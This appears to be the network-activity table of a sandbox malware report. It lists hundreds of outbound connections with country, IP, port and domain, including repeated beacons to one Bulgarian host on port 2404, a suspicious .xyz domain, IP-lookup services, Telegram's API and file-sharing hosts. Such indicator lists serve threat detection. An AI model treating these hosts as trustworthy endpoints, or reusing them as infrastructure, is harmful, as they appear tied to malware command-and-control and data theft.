| RU | 217.116.56.71:80 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| US | 140.82.114.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| CN | 120.91.173.133:80 | tcp | |
| US | 8.8.8.8:53 | 3.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 140.82.112.6:443 | api.github.com | tcp |
| US | 64.192.100.183:80 | tcp | |
| CN | 101.80.46.100:80 | tcp | |
| US | 72.116.66.123:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 8.8.8.8:53 | 21.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.112.82.140.in-addr.arpa | udp |
| US | 56.32.199.70:80 | tcp | |
| HK | 223.121.87.84:80 | tcp | |
| CN | 112.116.153.69:80 | tcp | |
| DK | 109.58.140.89:80 | tcp | |
| SG | 203.117.33.226:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| SE | 51.12.26.10:443 | tcp | |
| AU | 103.20.18.141:80 | tcp | |
| US | 29.139.22.93:443 | tcp | |
| US | 132.34.108.120:80 | tcp | |
| BE | 91.181.90.16:443 | tcp | |
| SG | 4.146.226.108:80 | tcp | |
| JP | 219.108.193.188:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| IT | 151.16.81.5:443 | tcp | |
| BR | 179.100.22.253:80 | tcp | |
| US | 150.221.6.94:80 | tcp | |
| BE | 213.193.153.42:80 | tcp | |
| N/A | 127.188.127.83:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 99.42.15.100:80 | tcp | |
| TW | 1.171.79.172:80 | tcp | |
| CA | 132.212.201.96:80 | tcp | |
| US | 34.39.139.84:80 | tcp | |
| BE | 151.248.51.207:80 | tcp | |
| US | 38.48.32.129:80 | tcp | |
| JP | 124.97.128.123:8080 | tcp | |
| KE | 169.239.254.183:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| HK | 210.24.93.74:80 | tcp | |
| SE | 104.88.15.4:80 | tcp | |
| US | 8.8.8.8:53 | 4.15.88.104.in-addr.arpa | udp |
| US | 153.57.55.160:8080 | tcp | |
| SA | 129.208.216.97:80 | tcp | |
| US | 204.184.168.127:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 32.45.41.209:80 | tcp | |
| JP | 218.225.46.87:80 | tcp | |
| US | 56.9.98.164:80 | tcp | |
| US | 9.160.164.103:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| N/A | 127.1.75.123:80 | tcp | |
| IN | 157.41.188.58:80 | tcp | |
| AU | 120.152.228.55:80 | tcp | |
| US | 12.195.39.182:80 | tcp | |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| TR | 78.191.193.242:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| SE | 147.180.164.21:80 | tcp | |
| NL | 188.200.62.111:80 | tcp | |
| US | 21.71.110.79:80 | tcp | |
| US | 32.22.190.175:80 | tcp | |
| US | 55.168.59.251:80 | tcp | |
| HK | 38.239.195.153:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 97.169.16.241:8080 | tcp | |
| US | 97.222.17.88:80 | tcp | |
| US | 8.8.8.8:53 | 153.195.239.38.in-addr.arpa | udp |
| US | 174.68.165.248:80 | tcp | |
| US | 136.62.204.225:80 | tcp | |
| ES | 2.153.193.108:80 | tcp | |
| BR | 177.61.253.73:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| ZA | 41.119.252.47:80 | tcp | |
| US | 99.205.59.24:80 | tcp | |
| IT | 151.79.251.10:80 | tcp | |
| US | 209.172.196.48:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| IL | 77.139.115.196:443 | tcp | |
| US | 7.209.5.169:80 | tcp | |
| RU | 45.135.232.2:21308 | tcp | |
| US | 18.237.233.113:80 | tcp | |
| US | 71.2.58.230:80 | tcp | |
| US | 8.8.8.8:53 | 2.232.135.45.in-addr.arpa | udp |
| CA | 99.248.147.232:80 | tcp | |
| CN | 222.202.118.164:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 6.101.190.164:80 | tcp | |
| US | 50.116.104.36:80 | tcp | |
| US | 173.194.208.126:80 | tcp | |
| GB | 147.150.41.91:80 | tcp | |
| US | 8.8.8.8:53 | 126.208.194.173.in-addr.arpa | udp |
| RU | 185.149.146.41:17355 | tcp | |
| US | 205.19.69.5:80 | tcp | |
| PK | 203.130.12.155:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 8.8.8.8:53 | 41.146.149.185.in-addr.arpa | udp |
| CN | 111.131.26.179:80 | tcp | |
| GB | 25.162.112.115:80 | tcp | |
| CN | 122.5.219.57:80 | tcp | |
| US | 54.49.10.156:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| FI | 194.157.148.109:443 | tcp | |
| IR | 95.64.76.122:8080 | tcp | |
| US | 167.13.44.179:80 | tcp | |
| US | 205.245.77.119:80 | tcp | |
| TW | 218.160.116.58:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| EG | 41.179.90.142:443 | tcp | |
| US | 99.127.30.195:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 99.89.82.231:8080 | tcp | |
| CN | 175.56.168.167:443 | tcp | |
| FR | 176.190.178.59:80 | tcp | |
| GB | 90.216.88.19:80 | tcp | |
| BG | 193.42.32.99:80 | 193.42.32.99 | tcp |
| US | 66.235.249.145:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 6.33.4.212:80 | tcp | |
| ES | 85.137.229.53:80 | tcp | |
| US | 196.240.29.190:80 | tcp | |
| US | 8.8.8.8:53 | 99.32.42.193.in-addr.arpa | udp |
| CN | 101.230.132.150:80 | tcp | |
| JP | 61.126.62.80:80 | tcp | |
| US | 205.181.215.187:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| GB | 94.237.61.135:443 | tcp | |
| CA | 142.68.250.157:80 | tcp | |
| US | 11.53.180.227:80 | tcp | |
| US | 64.125.119.86:8080 | tcp | |
| FR | 5.51.184.88:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| CH | 185.246.146.147:80 | tcp | |
| US | 97.199.146.123:80 | tcp | |
| JP | 122.217.245.46:80 | tcp | |
| IN | 117.254.216.123:443 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 11.92.113.197:80 | tcp | |
| ZA | 197.105.154.222:80 | tcp | |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| US | 19.209.34.7:80 | tcp | |
| KR | 175.219.134.218:80 | tcp | |
| US | 6.218.152.142:80 | tcp | |
| SG | 101.46.247.224:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 143.213.90.5:80 | tcp | |
| HK | 219.77.103.103:80 | tcp | |
| US | 63.88.74.64:80 | tcp | |
| CN | 60.160.221.161:80 | tcp | |
| JP | 219.127.42.158:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| CN | 120.195.251.194:80 | tcp | |
| JP | 218.251.212.115:80 | tcp | |
| US | 8.8.8.8:53 | www.premiumistudysolution.com | udp |
| CA | 142.44.226.116:80 | www.premiumistudysolution.com | tcp |
| US | 128.218.155.40:80 | tcp | |
| US | 18.76.83.66:80 | tcp | |
| US | 8.8.8.8:53 | 116.226.44.142.in-addr.arpa | udp |
| US | 216.249.22.117:80 | tcp | |
| CN | 119.97.111.69:8080 | tcp | |
| US | 70.113.52.112:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 135.45.232.228:80 | tcp | |
| US | 205.117.60.241:80 | tcp | |
| US | 89.117.55.98:4499 | tcp | |
| US | 161.180.221.79:443 | tcp | |
| US | 194.36.36.22:80 | tcp | |
| US | 155.142.217.164:8080 | tcp | |
| US | 8.8.8.8:53 | 98.55.117.89.in-addr.arpa | udp |
| BG | 193.42.32.237:2404 | tcp | |
| CA | 173.180.136.5:80 | tcp | |
| US | 165.236.230.216:80 | tcp | |
| US | 11.228.133.9:80 | tcp | |
| US | 173.160.50.203:443 | tcp | |
| IT | 88.51.85.56:80 | tcp | |
| DE | 217.160.37.81:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 24.74.168.4:80 | tcp | |
| US | 33.10.7.161:80 | tcp | |
| CA | 24.201.115.234:80 | tcp | |
| DE | 149.246.166.234:80 | tcp | |
| US | 71.96.29.154:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| FR | 213.180.253.8:80 | tcp | |
| JP | 150.84.177.88:80 | tcp | |
| TR | 5.46.169.138:80 | tcp | |
| US | 174.63.90.75:80 | tcp | |
| DE | 144.76.128.184:80 | tcp | |
| NL | 81.85.40.85:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 143.240.169.133:80 | tcp | |
| MX | 201.123.133.244:80 | tcp | |
| US | 169.252.222.10:80 | tcp | |
| US | 205.197.39.166:80 | tcp | |
| US | 8.8.8.8:53 | www.haztutestamento.com | udp |
| US | 34.102.136.180:80 | www.haztutestamento.com | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 194.59.30.72:80 | tcp | |
| NL | 141.93.231.136:80 | tcp | |
| US | 8.8.8.8:53 | 180.136.102.34.in-addr.arpa | udp |
| US | 4.112.26.185:8080 | tcp | |
| US | 205.20.190.164:443 | tcp | |
| FR | 77.156.4.223:80 | tcp | |
| DE | 153.93.77.227:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| AR | 186.109.132.144:80 | tcp | |
| UA | 95.134.15.21:80 | tcp | |
| US | 159.246.112.71:80 | tcp | |
| TW | 36.230.14.119:80 | tcp | |
| CA | 134.117.6.51:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 8.8.8.8:53 | 51.6.117.134.in-addr.arpa | udp |
| IT | 94.87.231.96:80 | tcp | |
| CA | 38.3.71.216:80 | tcp | |
| US | 172.85.247.174:80 | tcp | |
| US | 63.7.116.181:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| CN | 220.174.229.197:443 | tcp | |
| US | 171.196.32.107:80 | tcp | |
| KR | 116.37.34.174:80 | tcp | |
| JP | 180.11.143.120:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 207.88.246.129:8080 | tcp | |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| IN | 103.183.88.123:80 | tcp | |
| JP | 180.198.110.74:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| JP | 182.23.232.75:80 | tcp | |
| GB | 217.15.162.206:80 | tcp | |
| US | 8.8.8.8:53 | www.webpanel.cfd | udp |
| IN | 180.151.80.24:443 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 23.96.212.211:443 | tcp | |
| JP | 203.139.147.245:80 | tcp | |
| CN | 106.26.37.136:80 | tcp | |
| US | 209.120.160.229:80 | tcp | |
| CN | 59.82.212.29:80 | tcp | |
| US | 33.12.105.104:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| AR | 181.92.219.132:80 | tcp | |
| SD | 197.208.222.90:80 | tcp | |
| FR | 13.39.245.134:80 | tcp | |
| KR | 14.65.232.87:80 | tcp | |
| US | 29.71.83.73:8080 | tcp | |
| NL | 109.32.11.117:8080 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 28.19.248.132:80 | tcp | |
| KR | 115.6.34.81:80 | tcp | |
| US | 24.47.122.6:80 | tcp | |
| KW | 139.141.148.233:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 184.1.191.199:80 | tcp | |
| US | 26.194.242.245:80 | tcp | |
| CN | 171.217.157.145:80 | tcp | |
| US | 156.37.79.40:80 | tcp | |
| DE | 53.39.98.221:80 | tcp | |
| GT | 168.234.16.66:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| IE | 54.155.22.30:80 | tcp | |
| US | 199.122.16.8:80 | tcp | |
| US | 6.127.248.186:80 | tcp | |
| AU | 58.166.49.155:80 | tcp | |
| US | 8.8.8.8:53 | phonevronlene.xyz | udp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.215.122.150:80 | tcp | |
| US | 167.122.114.18:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 8.8.8.8:53 | www.yoyufoods.com | udp |
| DE | 217.160.0.55:80 | www.yoyufoods.com | tcp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| DE | 51.116.78.150:80 | tcp | |
| ZA | 197.102.40.91:8080 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 8.8.8.8:53 | 55.0.160.217.in-addr.arpa | udp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 150.234.142.131:80 | tcp | |
| UA | 178.133.112.222:8080 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 207.29.114.180:80 | tcp | |
| BE | 78.21.198.121:443 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| RU | 45.135.232.2:21308 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 135.34.47.87:80 | tcp | |
| IN | 47.15.60.35:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 215.83.222.184:80 | tcp | |
| CA | 135.19.3.24:8080 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| JP | 220.29.178.152:8080 | tcp | |
| MA | 196.114.168.177:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| SA | 95.184.53.50:8080 | tcp | |
| ZM | 102.144.31.207:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 57.112.87.100:80 | tcp | |
| AU | 155.143.52.105:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| SG | 43.88.224.16:80 | tcp | |
| US | 72.175.100.3:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 196.196.233.242:80 | tcp | |
| HK | 124.244.216.144:80 | tcp | |
| FR | 51.254.49.49:222 | 51.254.49.49 | tcp |
| US | 150.120.71.110:80 | tcp | |
| US | 72.196.162.153:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 8.8.8.8:53 | 49.49.254.51.in-addr.arpa | udp |
| US | 184.191.39.103:443 | tcp | |
| IT | 2.117.190.102:443 | tcp | |
| CN | 112.194.189.22:80 | tcp | |
| DE | 53.250.139.227:80 | tcp | |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 8.8.8.8:53 | nn9w1w.am.files.1drv.com | udp |
| US | 13.107.42.12:443 | nn9w1w.am.files.1drv.com | tcp |
| US | 8.8.8.8:53 | 13.42.107.13.in-addr.arpa | udp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| DE | 87.132.2.120:8080 | tcp | |
| AU | 168.1.80.222:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 8.8.8.8:53 | 12.42.107.13.in-addr.arpa | udp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| KR | 211.173.187.157:80 | tcp | |
| KR | 121.164.104.32:443 | tcp | |
| N/A | 10.6.27.220:80 | tcp | |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| YE | 175.110.7.228:80 | tcp | |
| FR | 176.167.80.224:80 | tcp | |
| US | 17.38.250.68:80 | tcp | |
| US | 153.61.23.28:80 | tcp | |
| US | 192.3.108.47:80 | 192.3.108.47 | tcp |
| JP | 126.102.1.151:80 | tcp | |
| US | 8.8.8.8:53 | 47.108.3.192.in-addr.arpa | udp |
| BG | 193.42.32.237:2404 | tcp | |
| SE | 51.12.152.139:443 | tcp | |
| US | 135.89.143.190:80 | tcp | |
| JP | 210.255.39.79:80 | tcp | |
| US | 209.203.107.215:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 64.115.104.192:80 | tcp | |
| TW | 118.170.146.3:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| AU | 147.10.74.58:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 8.8.8.8:53 | marrakechfolkloredays.com | udp |
| US | 104.21.83.63:80 | marrakechfolkloredays.com | tcp |
| US | 104.21.83.63:443 | marrakechfolkloredays.com | tcp |
| HK | 218.102.162.222:80 | tcp | |
| US | 69.37.222.168:80 | tcp | |
| US | 168.38.129.69:80 | tcp | |
| US | 8.8.8.8:53 | 63.83.21.104.in-addr.arpa | udp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 24.91.87.182:80 | tcp | |
| US | 104.30.21.37:80 | tcp | |
| FR | 78.226.21.107:80 | tcp | |
| US | 66.80.188.97:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 97.9.250.22:80 | tcp | |
| HK | 156.250.16.178:80 | tcp | |
| US | 215.229.95.151:80 | tcp | |
| US | 8.8.8.8:53 | 178.16.250.156.in-addr.arpa | udp |
| CN | 101.40.98.136:80 | tcp | |
| HK | 103.200.202.235:80 | tcp | |
| US | 97.197.18.166:80 | tcp | |
| IN | 13.234.3.5:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| CN | 113.5.233.115:80 | tcp | |
| US | 8.8.8.8:53 | www.avondalemclarenparts.com | udp |
| US | 13.248.148.254:80 | www.avondalemclarenparts.com | tcp |
| US | 8.8.8.8:53 | africatechs.com | udp |
| GB | 129.11.145.95:8080 | tcp | |
| US | 209.156.240.38:80 | tcp | |
| US | 172.67.140.104:80 | africatechs.com | tcp |
| JP | 133.60.236.200:80 | tcp | |
| US | 8.8.8.8:53 | transfer.sh | udp |
| US | 8.8.8.8:53 | 254.148.248.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.140.67.172.in-addr.arpa | udp |
| US | 172.67.140.104:443 | africatechs.com | tcp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| BG | 193.42.32.237:2404 | tcp | |
| JP | 153.227.42.218:80 | tcp | |
| EG | 197.39.156.76:80 | tcp | |
| MX | 189.197.184.145:80 | tcp | |
| FR | 51.254.49.49:222 | 51.254.49.49 | tcp |
| AU | 120.154.4.199:80 | tcp | |
| RO | 188.119.167.233:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 209.75.80.61:80 | tcp | |
| CN | 119.98.78.190:80 | tcp | |
| US | 8.8.8.8:53 | 233.167.119.188.in-addr.arpa | udp |
| US | 47.145.105.42:80 | tcp | |
| US | 199.2.166.222:80 | tcp | |
| US | 134.15.20.191:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| KR | 52.231.200.8:8080 | tcp | |
| TW | 120.108.63.137:80 | tcp | |
| NO | 161.4.82.188:80 | tcp | |
| US | 71.152.39.52:443 | tcp | |
| KR | 223.41.146.62:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 199.171.106.148:80 | tcp | |
| GB | 25.253.254.119:8080 | tcp | |
| US | 55.65.245.170:80 | tcp | |
| US | 157.246.91.4:8080 | tcp | |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 173.231.16.76:443 | api.ipify.org | tcp |
| GB | 86.190.170.144:80 | tcp | |
| US | 144.71.79.227:80 | tcp | |
| US | 8.8.8.8:53 | 76.16.231.173.in-addr.arpa | udp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 158.85.210.242:8080 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 192.20.215.81:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| CN | 218.78.183.245:80 | tcp | |
| US | 8.80.119.129:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| CN | 103.222.176.57:80 | tcp | |
| US | 75.240.221.221:80 | tcp | |
| US | 8.8.8.8:53 | www.firstenergyconp.com | udp |
| US | 13.248.148.254:80 | www.firstenergyconp.com | tcp |
| CN | 116.228.163.198:80 | tcp | |
| CN | 116.23.175.50:80 | tcp | |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| US | 149.2.186.32:80 | tcp | |
| US | 99.134.71.134:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 22.173.59.26:443 | tcp | |
| KR | 121.171.82.1:443 | tcp | |
| RU | 5.42.64.33:80 | 5.42.64.33 | tcp |
| BD | 103.202.55.172:65012 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 8.8.8.8:53 | 33.64.42.5.in-addr.arpa | udp |
| BR | 186.208.169.56:80 | tcp | |
| MX | 187.194.100.179:80 | tcp | |
| US | 67.39.190.3:80 | tcp | |
| RU | 82.179.186.205:8080 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| HK | 154.221.26.108:80 | app.nnnaajjjgc.com | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 172.188.22.63:80 | tcp | |
| US | 47.45.89.145:80 | tcp | |
| FR | 139.124.56.65:80 | tcp | |
| MU | 156.242.119.47:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 129.115.36.101:80 | tcp | |
| KW | 62.150.114.185:443 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| CH | 141.171.139.203:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| AU | 49.182.251.96:8080 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| MX | 189.222.249.95:80 | tcp | |
| US | 134.187.156.137:80 | tcp | |
| US | 76.236.20.41:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| GB | 85.95.105.95:80 | tcp | |
| VN | 171.227.236.218:80 | tcp | |
| EG | 156.194.111.226:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| SD | 154.98.2.72:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 98.113.226.246:80 | tcp | |
| MA | 41.248.152.139:80 | tcp | |
| US | 141.107.125.53:80 | tcp | |
| US | 8.8.8.8:53 | gitlab.com | udp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| DE | 217.232.160.7:80 | tcp | |
| US | 172.65.251.78:443 | gitlab.com | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 8.8.8.8:53 | 78.251.65.172.in-addr.arpa | udp |
| US | 7.52.229.175:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 67.40.54.109:80 | tcp | |
| CL | 191.116.86.178:443 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 184.132.151.203:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| DE | 46.252.137.255:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| RU | 128.70.24.30:80 | tcp | |
| FR | 54.36.43.170:80 | tcp | |
| US | 40.139.22.64:80 | tcp | |
| US | 15.166.27.185:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| FR | 54.36.31.172:80 | tcp | |
| BR | 186.224.140.85:80 | tcp | |
| BD | 103.202.55.172:65012 | tcp | |
| US | 8.8.8.8:53 | www.abilitytoday.news | udp |
| US | 26.114.125.176:8080 | tcp | |
| US | 130.99.173.134:80 | tcp | |
| GB | 5.134.9.76:80 | www.abilitytoday.news | tcp |
| US | 8.8.8.8:53 | 76.9.134.5.in-addr.arpa | udp |
| BG | 193.42.32.237:2404 | tcp | |
| DE | 77.186.137.142:8080 | tcp | |
| GB | 137.221.177.233:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 50.136.104.190:80 | tcp | |
| RO | 176.113.110.204:80 | tcp | |
| US | 6.6.126.203:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 28.176.254.9:80 | tcp | |
| CN | 122.246.227.228:80 | tcp | |
| US | 71.217.120.85:80 | tcp | |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| JO | 93.95.205.138:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| JP | 125.206.22.151:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| NL | 89.248.131.112:80 | tcp | |
| US | 8.8.8.8:53 | 169.8.226.132.in-addr.arpa | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| PL | 176.106.104.161:80 | tcp | |
| GB | 137.50.81.81:80 | tcp | |
| US | 107.224.152.188:80 | tcp | |
| CN | 183.48.162.33:8080 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| KR | 124.57.214.61:80 | tcp | |
| IT | 81.56.102.179:80 | tcp | |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| US | 131.199.6.66:8080 | tcp | |
| AE | 94.206.123.56:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| CN | 158.60.105.134:80 | tcp | |
| US | 15.180.237.219:80 | tcp | |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| CN | 116.236.130.236:80 | tcp | |
| US | 100.63.76.97:80 | tcp | |
| JP | 126.96.194.235:80 | tcp | |
| MA | 105.155.72.60:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 8.8.8.8:53 | www.nongsanvietco.com | udp |
| CR | 201.192.28.231:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| VN | 103.75.184.21:80 | www.nongsanvietco.com | tcp |
| AU | 58.111.66.221:80 | tcp | |
| BR | 187.43.63.209:80 | tcp | |
| MX | 189.241.210.201:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 8.8.8.8:53 | 21.184.75.103.in-addr.arpa | udp |
| BD | 103.202.55.172:65012 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 136.46.143.97:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| BR | 200.189.201.126:80 | tcp | |
| BE | 192.101.252.251:80 | tcp | |
| US | 104.21.83.63:80 | marrakechfolkloredays.com | tcp |
| US | 104.21.83.63:443 | marrakechfolkloredays.com | tcp |
